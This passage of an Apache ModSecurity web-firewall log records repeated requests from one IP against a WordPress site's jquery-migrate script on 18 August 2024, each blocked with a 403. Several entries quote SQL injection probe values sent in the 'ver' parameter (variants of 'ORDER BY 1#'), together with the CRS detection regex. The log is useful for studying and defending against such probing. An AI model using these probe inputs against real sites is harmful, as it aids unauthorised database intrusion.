"/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM30usHEVNaz1QkYN6kQAAAMQ"] [Sun Aug 18 00:55:43.649343 2024] [:error] [pid 26175:tid 140111060645632] [client 92.51.2.78:60956] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM30usHEVNaz1QkYN6kgAAAMc"] [Sun Aug 18 00:55:44.498382 2024] [:error] [pid 26175:tid 140111069038336] [client 92.51.2.78:60958] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM4EusHEVNaz1QkYN6kwAAAMY"] [Sun Aug 18 00:55:44.709246 2024] [:error] [pid 25551:tid 140110917969664] [client 92.51.2.78:60960] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM4CSCXpUXSc3dPnIVCQAAAJg"] [Sun Aug 18 00:55:45.408228 2024] [:error] [pid 25551:tid 140110985111296] [client 92.51.2.78:60962] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM4SSCXpUXSc3dPnIVCgAAAJA"] [Sun Aug 18 00:55:45.846600 2024] [:error] [pid 25550:tid 140111010289408] [client 92.51.2.78:60964] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM4fn89YewL24c7_QPzQAAAE0"] [Sun Aug 18 00:55:46.179696 2024] [:error] [pid 26175:tid 140110976718592] [client 92.51.2.78:60966] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM4kusHEVNaz1QkYN6lAAAANE"] [Sun Aug 18 00:55:47.264218 2024] [:error] [pid 26175:tid 140111001896704] [client 92.51.2.78:60968] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM40usHEVNaz1QkYN6lQAAAM4"] [Sun Aug 18 00:55:48.023712 2024] [:error] [pid 26175:tid 140111052252928] [client 92.51.2.78:60970] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: ) ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM5EusHEVNaz1QkYN6lgAAAMg"] [Sun Aug 18 00:55:48.449536 2024] [:error] [pid 26175:tid 140110943147776] [client 92.51.2.78:60972] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM5EusHEVNaz1QkYN6lwAAANU"] [Sun Aug 18 00:55:49.112057 2024] [:error] [pid 25551:tid 140110976718592] [client 92.51.2.78:60974] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM5SSCXpUXSc3dPnIVCwAAAJE"] [Sun Aug 18 00:55:49.727799 2024] [:error] [pid 25550:tid 140110951540480] [client 92.51.2.78:60976] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM5fn89YewL24c7_QPzgAAAFQ"] [Sun Aug 18 00:55:50.307639 2024] [:error] [pid 26175:tid 140110968325888] [client 92.51.2.78:60978] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM5kusHEVNaz1QkYN6mAAAANI"] [Sun Aug 18 00:55:50.974148 2024] [:error] [pid 25550:tid 140110976718592] [client 92.51.2.78:60980] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM5vn89YewL24c7_QPzwAAAFE"] [Sun Aug 18 00:55:51.689351 2024] [:error] [pid 26175:tid 140110985111296] [client 92.51.2.78:60982] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM50usHEVNaz1QkYN6mQAAANA"] [Sun Aug 18 00:55:51.902081 2024] [:error] [pid 26175:tid 140110926362368] [client 92.51.2.78:60984] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM50usHEVNaz1QkYN6mgAAANc"] [Sun Aug 18 00:55:52.685867 2024] [:error] [pid 26175:tid 140110951540480] [client 92.51.2.78:60986] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM6EusHEVNaz1QkYN6mwAAANQ"] [Sun Aug 18 00:55:53.519966 2024] [:error] [pid 25549:tid 140111035467520] [client 92.51.2.78:60990] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM6ZVyS4wZaDPTA77mTQAAAAo"] [Sun Aug 18 00:55:54.044245 2024] [:error] [pid 25549:tid 140110917969664] [client 92.51.2.78:60992] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM6pVyS4wZaDPTA77mTgAAABg"] [Sun Aug 18 00:55:54.667152 2024] [:error] [pid 25551:tid 140111035467520] [client 92.51.2.78:60994] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM6iSCXpUXSc3dPnIVDAAAAIo"] [Sun Aug 18 00:55:55.347733 2024] [:error] [pid 25551:tid 140111027074816] [client 92.51.2.78:60996] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM6ySCXpUXSc3dPnIVDQAAAIs"] [Sun Aug 18 00:55:55.878670 2024] [:error] [pid 25551:tid 140110926362368] [client 92.51.2.78:60998] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM6ySCXpUXSc3dPnIVDgAAAJc"] [Sun Aug 18 00:55:56.508232 2024] [:error] [pid 25551:tid 140110959933184] [client 92.51.2.78:32768] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM7CSCXpUXSc3dPnIVDwAAAJM"] [Sun Aug 18 00:55:57.301546 2024] [:error] [pid 25550:tid 140110985111296] [client 92.51.2.78:32770] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM7fn89YewL24c7_QP0AAAAFA"] [Sun Aug 18 00:55:57.757877 2024] [:error] [pid 26175:tid 140110934755072] [client 92.51.2.78:32772] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM7UusHEVNaz1QkYN6nAAAANY"] [Sun Aug 18 00:55:58.269252 2024] [:error] [pid 26175:tid 140111094216448] [client 92.51.2.78:32774] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM7kusHEVNaz1QkYN6nQAAAMM"] [Sun Aug 18 00:55:58.612673 2024] [:error] [pid 25550:tid 140110968325888] [client 92.51.2.78:32776] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM7vn89YewL24c7_QP0QAAAFI"] [Sun Aug 18 00:55:59.627323 2024] [:error] [pid 25549:tid 140111069038336] [client 92.51.2.78:32778] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM75VyS4wZaDPTA77mTwAAAAY"] [Sun Aug 18 00:56:00.106552 2024] [:error] [pid 25551:tid 140111018682112] [client 92.51.2.78:32780] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM8CSCXpUXSc3dPnIVEAAAAIw"] [Sun Aug 18 00:56:00.786368 2024] [:error] [pid 25550:tid 140111094216448] [client 92.51.2.78:32782] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM8Pn89YewL24c7_QP0gAAAEM"] [Sun Aug 18 00:56:01.605385 2024] [:error] [pid 25550:tid 140111191197440] [client 92.51.2.78:32784] [client 92.51.2.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: ') ORDER BY 1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-includes/js/jquery/jquery-migrate.min.js"] [unique_id "ZsGM8fn89YewL24c7_QP0wAAAEA"] [Sun Aug 18 00:56:01.921615 2024] [:error] 